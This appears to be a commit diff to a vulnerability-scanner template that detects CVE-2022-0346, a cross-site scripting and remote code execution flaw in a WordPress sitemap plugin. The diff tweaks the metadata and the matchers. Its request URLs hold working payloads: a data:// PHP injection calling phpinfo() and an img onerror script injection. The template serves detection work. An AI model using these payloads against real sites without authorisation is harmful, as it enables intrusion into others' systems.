Update CVE-2022-0346.yaml

cves/2022/CVE-2022-0346.yaml

@@ -1,7 +1,7 @@
 id: CVE-2022-0346
 
 info:
-  name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
+  name: Google XML Sitemap Generator < 2.0.4 - Cross-Site Scripting & RCE
   author: Akincibor
   severity: medium
   description: |
@@ -16,8 +16,8 @@ info:
     cve-id: CVE-2022-0346
     cwe-id: CWE-79
   metadata:
-    verified: "true"
+    verified: true
-  tags: xss,wp,wordpress,wp-plugin,cve,cve2022,wpscan
+  tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
 
 requests:
   - method: GET
@@ -25,13 +25,14 @@ requests:
       - '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
       - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
 
+    stop-at-first-match: true
     req-condition: true
     matchers-condition: and
     matchers:
       - type: dsl
         dsl:
           - "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
-          - "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') || contains(body_2, 'Invalid Renderer type specified')"
+          - "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, 'Invalid Provider type specified')"
         condition: or
 
       - type: word